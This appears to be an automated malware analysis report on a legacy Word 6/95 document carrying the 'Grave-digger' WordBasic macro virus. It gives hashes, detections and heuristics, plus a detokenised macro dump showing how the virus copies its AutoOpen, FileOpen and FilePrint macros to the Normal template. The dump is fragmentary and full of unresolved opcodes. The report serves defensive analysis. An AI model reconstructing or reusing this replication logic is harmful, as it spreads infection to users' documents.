Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dada0325bf9ab838…

MALICIOUS

Office (OLE)

Size: 7.0 KB
First seen: 2012-06-14
MD5: 4bafb37e6c9ad35a1cbd6602a0bd0122
SHA-1: 1e95d5ccfc7614c0471cd4956b3cfb174b3f0ba3
SHA-256: dada0325bf9ab83850a08854b587f7062bc9ef2eb7824fcfed33f2055e9625e5
Risk Score: 102

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of a legacy macro virus, specifically identified by 'RSN MACRO VIRUS Goat file' markers and historical creation details. The presence of WordBasic macro virus markers strongly suggests the use of Visual Basic for scripting, aligning with the T1059.005 MITRE ATT&CK technique. While no specific malicious actions are detailed beyond the historical context, the detection by ClamAV as Win.Trojan.Rats-2 indicates a known malicious signature.

Heuristics (3)

  • ClamAV: Win.Trojan.Rats-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Rats-2
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source [info] (OLE_LEGACY_WORDBASIC_MACRO_SOURCE)
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 957 bytes
SHA-256: 3689b6d98c8d05e698882b81eaadfda2af4af943011242b8f29ce8fbbb59c2b0
Preview script (first 1,000 lines of the extracted script)
+ 364 = @cmd6e65 =
MAIN
REM Grave-digger
MAIN
th = @cmd80f4 @cmd80f7
th 16 * fail
th
@cmdc011
@cmd8012 = @cmd8005 34 = ,   = @cmd8005 34 25625 dlg @cmd0058
dlg
dlg
@cmd0058 dlg
MAIN
thishour = @cmd80f4 @cmd80f7
thishour
thishour 13 * proiti
  8300
  8300
, - * fail
name$ = "Grave-digger"
name$
dlg @cmd0050
dlg
dlg
@cmd0050 dlg
k1 = 0
ic = @cmd80b7 1 , 0 , 0
i = 1 ic
ct$ = @cmd80b8 i , 1
ct$ = "Knell" k1 = 1
i
k1 = 1 * fail
@cmd0054 @cmd8025 , = 1
@cmd80c2 "Normal:AutoOp" , @cmd8025 = ":AutoOpen"
@cmd80c2 "Normal:Knell" , @cmd8025 = ":Knell"
@cmd80c2 "Normal:FileOpen" , @cmd8025 = ":Mutagen"
@cmd80c2 "Normal:FilePrint" , @cmd8025 = ":Zashib" 25625
MAIN
, - * fail
k = 0
j = @cmd80b7 0 , 0
i = 1 j
@cmd80b8 i , 0 , 0 = "Knell" k = 1
i
k = 1 * fail
@cmd80c2 @cmd8025 = ":AutoOpen" , "Normal:AutoOp"
@cmd80c2 @cmd8025 = ":Knell" , "Normal:Knell"
@cmd80c2 @cmd8025 = ":Mutagen" , "Normal:FileOpen"
@cmd80c2 @cmd8025 = ":Zashib" , "Normal:FilePrint" 25625